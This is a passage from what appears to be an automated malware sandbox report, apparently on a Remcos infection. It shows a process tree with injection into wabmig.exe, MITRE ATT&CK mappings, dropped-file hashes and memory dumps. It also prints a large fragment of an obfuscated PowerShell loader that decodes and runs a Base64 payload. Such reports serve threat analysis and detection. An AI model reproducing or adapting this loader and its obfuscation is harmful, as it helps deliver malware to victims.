Rend$SobriBJaloulTerradCh nndSeduceSki slVrdips Diph ');$Strumstrum=Mekong 'Irith$souffTFrdigrHodagaPyja.sBebias oreeBaksnr orfaeRunrorBruge.UnderDmi.ieoUer.awconstnFor ultrstoo onomaNatardLys oF DechiSer nltweageClois(Drfl.$SvabrAFastipBe.rapEmporeA,kanl OmdesSub cii nicnCou ttlavnirBalleeStormrP,sta, kams$Re.ilOMillir Submireevae SplanLagentRidabe K ssrHomode V lbnHugged St,eeBlind)begre ';$Orienterende=$Navneagtig[0];Chesteine (Mekong 'Beer $GarpiGOrendln.kkeoUnderbSydfra FladLSuper: ju eUJomfrNGnaven Unc.A GenbtBesttUsy teRRetiaaWirliL Sp iIsanktSPyohet Nonsi Far.C Synf=Uncov( M anTForbeEXenacsIndskTPluto-N nbopStum aForhatMagnuhLogic haarr$SoritooppebRSandbiS eipEDa.phnInte,tSysteeKvar rPresee MastnMusicdsalt.ERend )Gene ');while (!$Unnaturalistic) {Chesteine (Mekong 'Blu,t$Oks hgCuraslCatbroPljenbKonstaFlavol chry:Voc.mRAhornyU bandLithonLokkeiSkinknPaaregklbehs Breg= oost$Cata,tTomatrCallau Selvepa.te ') ;Chesteine $Strumstrum;Chesteine (Mekong 'B tleSExedrt UdbyaElsierCarditKysha-AcetoSmiljbl eboeegu zleSortbpProje Nonce4Gled. ');Chesteine (Mekong ' Cali$ .eengP.efelImbeloOmfa b RlinaFe.rylCykel:,kjolUS lvhn Emblnsamf a Limntsha.nuGtebarfi,suaConjelSucc,iCon es LofttlustriSsonecmegat=Prepr(HeredT .ilgeSc ewsVoidetIndis-HusdyPSubsiaIndistA gomhTvegg Klren$ AdorOFortrrUnderiBestyeBl,nkn AmfitUnchreFrr,srGenopeFy ennSee adwa ereceleo)Formu ') ;Chesteine (Mekong 'Udgif$KeepbgArrasl Steeo Wit.b pru,a eksel Biog:ZeuglS Faktl demoaskiedv Un eeTumortMechaiBo ofl Hy rv Ar hrSrtr.eGtepal KontsMaxi eImplirFremtn askoeSjoflsSub e= uizz$Rece gruskrlSirb osubstbSistea WomalFoul,:SororPDermaaTriklrIntuiaMasocuPteronThioitBevgee ekspr Omst4Crawf3 Luta+Tilgr+Af,vk%Campa$fami.S PinxoFrdigr edbjb Awole VerdtMet deDissirSkrll.Abor cIndgroQuintuDigitnS.ccht Skrd ') ;$Appelsintrer=$Sorbeter[$Slavetilvrelsernes];}$Tankebanerne=312475;$Myopically=29784;Chesteine (Mekong 'Akkor$Finm g bu glCountoBusteb YaffaViderlTiffi:T,oraTS nitrS,rvio F rsmVa drbTeo,uoPandocGrae.yDataut recet Shake Un.arPreex2 Tid.1 Re.r ems=Metoa aero GCounte KonttBa de-SeborCRheosoForhanBatlotS cioetrkninAntists dde Fora$ RdhtO SubirAlkvaiFlewseFor rnparadtSalice irkerRe isesmr rnSmagedForl,eValou ');Chesteine (Mekong 'Hv lf$FremdgJournlnonlioHariob dslaaDe ialUnsan:FerryH Me liAminop Udvip hromoBrit.tErythoKuttem Cy.eiPummecAkkreaElkholsa le Landb=ber i Raspb[LithoSGrillyAstensTjr.st,leiseEndorm Prod.KofteCMyggeoGonian.robovDelume K.ogrVandft Waff]Sprut:Erhol:halvfF BerrrFord,oMatzomPdagoB estta Dasys.vatoe Flag6 Conf4 MullSKommetSimmerNachuiRuddlnShelbgStrif(U ity$fryseTclabbrA beso lyngmSt esbCaco oExinecAngekyTilprtGravetNrs ne.amalrV.ndl2Bul,e1 yper)Combl ');Chesteine (Mekong 'Tyend$Sc pog PlowlMilieoWingbbFraflaGuitalSalg :LunteUExag nLsengi StranFanossKo,mitRens r,odbauStikbmUndere Re nn tjetPlatyaSkriflArbejlH droyancha Bel e= efro Talje[CigarSn miny aagesPasitt C.lieMountmAchar. NoveTSat ne Statx Sil tImagi.centrEtelefnB inkc llenoExtemd S.amiAiramnvulvogbib.s]Trner: tact: ni rAGardnSBaffiCBlik.I Me aITilvr. UngeGparaleMi,estU cubSDkspltSi,gar moriiOufounSh ddg ukas(Beskf$Cu.hiHAdvokilogi.p VelvpFo paoForsitUdtryoTung,m Ohi i Rot c C oca nvirl Aftv)Vanvi ');Chesteine (Mekong 'Ramsh$Scri.grawi lMelleoNitr bFavrpaUngenlIrbit: VidnTFlyabr oufyForstgRatiolDelageG inerSv,nkiN nlyeUholdr KladnIn orePeriosKlatm= ergp$AsparUFravan SubdiDuellnAtte sSupint idderPistouH andmOxa ae.nbumnTi sktAfv saSuperlMontilTelegy kldt. Du esSuboruU valbforkmsTotaltUnderrBo stiManurnFrig gQuint( Bul $Bo toTAnfrtaContanTrapekTrinveBalstbTweedanringnSolbae strer.laninRotereAdven, Civi$krigsMHerr yNigh o Tekopisoz,iSmirkcPro,ea Idehl DisslTr.lvySalon)Remem ');Chesteine $Trygleriernes;"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Network Service Discovery
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2944
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Apertured.Unu && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2636
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1552

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Network Service Discovery

1

T1046

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
e8102380168175b793bfce6e7fe8518e

SHA1
a7f0f2943eac96f00b68524779da82fc638febc6

SHA256
d491b608aa00e6e86ed45d2614ed1f4b43df1970087a4cf8728454507f009981

SHA512
b6bf68c25c6ea15cc5f8d484e21db3f84bc30673b7648f64c704030a5baadb3e3078c95500294c5763fe3acb72858877d11121607b201f74bdc53ce4c13286f2

Download Submit
C:\Users\Admin\AppData\Roaming\Apertured.Unu

Filesize
445KB

MD5
de23e8c307aeb7b1a86e2bcd803f6e8e

SHA1
383ef0f85f58253f67d9956949f0f8d58ff65e4c

SHA256
6bf2233f81a46ed8ac16574bde4974ad570c29fe08c5786be33a0a2978ddb228

SHA512
098660526474c8609345921d6c4ecc19e8364a68dea621d29da141e2aabcf251fd0909f208d04dd69a7d3386c40ffa9fcabd51f25ca69b47ae003ffa05b37aa4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RUQMQKRGWSHQ5YH1E57J.temp

Filesize
7KB

MD5
245c5247fa275d5b2b4276dc0925e578

SHA1
af0ca5d7e3240d96ee24dd9193adfaf6bd3493af

SHA256
b864ef1c99a651d5b6ef7f7a1c04750baf14402afab285bddeaaf4c5551d2fa3

SHA512
2bd4c553795bb543675834265ea4bbf8861d1e422346cd3b39c91fc58f57037f1c4c9e34bf9a83a5b31eb3a481234c4598f2360005b6a7de6db6f0f82e3c5fbb

Download Submit
memory/1216-5-0x000000001B590000-0x000000001B872000-memory.dmp

Filesize
2.9MB

Download
memory/1216-15-0x000007FEF6370000-0x000007FEF6D0D000-memory.dmp

Filesize
9.6MB

Download
memory/1216-10-0x000007FEF6370000-0x000007FEF6D0D000-memory.dmp

Filesize
9.6MB

Download
memory/1216-9-0x000007FEF6370000-0x000007FEF6D0D000-memory.dmp

Filesize
9.6MB

Download
memory/1216-11-0x000007FEF6370000-0x000007FEF6D0D000-memory.dmp

Filesize
9.6MB

Download
memory/1216-13-0x000007FEF662E000-0x000007FEF662F000-memory.dmp

Filesize
4KB

Download
memory/1216-14-0x000007FEF6370000-0x000007FEF6D0D000-memory.dmp

Filesize
9.6MB

Download
memory/1216-4-0x000007FEF662E000-0x000007FEF662F000-memory.dmp

Filesize
4KB

Download
memory/1216-6-0x000007FEF6370000-0x000007FEF6D0D000-memory.dmp

Filesize
9.6MB

Download
memory/1216-7-0x0000000002860000-0x0000000002868000-memory.dmp

Filesize
32KB

Download
memory/1216-8-0x000007FEF6370000-0x000007FEF6D0D000-memory.dmp

Filesize
9.6MB

Download
memory/1216-46-0x000007FEF6370000-0x000007FEF6D0D000-memory.dmp

Filesize
9.6MB

Download
memory/1552-21-0x0000000001B70000-0x00000000067DB000-memory.dmp

Filesize
76.4MB

Download
memory/1552-45-0x0000000001B70000-0x00000000067DB000-memory.dmp

Filesize
76.4MB

Download
memory/2944-20-0x00000000065E0000-0x000000000B24B000-memory.dmp

Filesize
76.4MB

Download

Analysis

Sharing